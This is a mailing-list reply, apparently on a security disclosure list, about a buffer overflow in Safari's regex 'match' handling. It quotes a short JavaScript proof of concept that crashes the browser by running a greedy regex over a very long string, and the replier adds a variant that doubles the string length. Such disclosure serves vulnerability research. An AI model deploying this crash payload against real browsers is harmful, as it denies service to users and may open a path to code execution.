[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Apple Safari "match" Buffer Overflow Vulnerability



jbh_cg@xxxxxxxx wrote:
The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4.
A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.

<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z); </script>

while (z.length <= 16384) z+=z;


--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature